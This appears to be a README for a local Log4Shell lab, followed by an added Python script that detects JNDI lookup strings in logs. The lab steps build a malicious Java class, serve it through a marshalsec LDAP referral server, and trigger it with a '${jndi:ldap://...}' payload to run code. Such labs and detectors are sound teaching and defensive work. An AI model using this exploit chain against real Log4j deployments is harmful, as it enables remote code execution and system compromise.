- Step 1 : Clone this repository.
- Step 2 : Move the `Exploit.java` file to a different folder. In my case I've created a folder `rce` inside the home directory: `/home/coldfusionx/rce`
- Step 3 : Peeking at `Exploit.java`: here you can change the remote code to anything. In this case it pops up `gnome-calculator` on an Ubuntu machine.
- Step 4 : Next we need to compile `Exploit.java` using the command `javac Exploit.java`. Once it compiles successfully, we should see a new file `Exploit.class` created.
- Step 5 : Start a Python HTTP server to host `Exploit.class` using `python3 -m http.server 8888`. Alternatively, you can use a PHP server with the command `php -S 127.0.0.1:8888`.
- Step 6 : Load the project files into IntelliJ IDEA and let Maven complete the file indexing. Once completed your project should look like this :
- Step 7 : For running the project, we need to create a configuration. Click on `Add Configuration`:
  1. Select `Application`
  2. Select the main class
  3. Select the JDK and apply.
  4. You should see the Log4j Application created, ready to run.
- Step 8 : Next we start the LDAPRefServer using marshalsec :
  - `cd marshasec`
  - Run `java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"` to start the LDAP server. Here `127.0.0.1:8888` is the Python server hosting `Exploit.class`, hence we specify `/#Exploit`.
- Step 9 : Edit the JNDI payload in `log4j.java` as per your requirement: `logger.error("${jndi:ldap://127.0.0.1:1389/Exploit}");` In this case we are loading the remote class `Exploit`; the LDAP referrer server will redirect the request to our Python server hosting the malicious `Exploit` class.
- Step 10 : Run `Log4j`. On a successful run you should see a GNOME calculator pop up.
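To see what this lab leaves behind in logs, the following added example (not part of this repository) scans log lines for the JNDI lookup string from step 9, in plain or percent-encoded form, and extracts the scheme, host, port and class name. The function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Lookup form used in step 9: ${jndi:<scheme>://host:port/name}
JNDI_LOOKUP = re.compile(r"\$\{jndi:([a-z]+://[^}\s]+)\}", re.IGNORECASE)


def find_jndi_lookups(line):
    """Return one dict per JNDI lookup found in a single log line."""
    # Web access logs usually store the string percent-encoded, so decode first.
    decoded = unquote(line)
    hits = []
    for match in JNDI_LOOKUP.finditer(decoded):
        raw = match.group(1)
        hit = {"raw": raw, "scheme": None, "host": None, "port": None, "name": None}
        try:
            url = urlsplit(raw)
            hit.update(scheme=url.scheme.lower(), host=url.hostname,
                       port=url.port, name=url.path.lstrip("/"))
        except ValueError:
            pass  # malformed host or port: still report the raw lookup
        hits.append(hit)
    return hits


def scan(lines):
    """Yield (line_number, hit) for every lookup in an iterable of log lines."""
    for number, line in enumerate(lines, start=1):
        for hit in find_jndi_lookups(line):
            yield number, hit


# Constructed sample log lines (not captured from a real system).
SAMPLE_LOG = [
    "2021-12-12 10:00:01 ERROR log4j - ${jndi:ldap://127.0.0.1:1389/Exploit}",
    "2021-12-12 10:00:02 INFO  log4j - user login ok",
    '127.0.0.1 - - "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F127.0.0.1%3A1389%2FExploit%7D HTTP/1.1" 200',
]

if __name__ == "__main__":
    for number, hit in scan(SAMPLE_LOG):
        print(f"line {number}: {hit['raw']} -> class {hit['name']}")
```

Pointing `scan()` at the application log of the lab machine after step 10 should report the lookup together with the `1389` LDAP port used by the marshalsec server.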










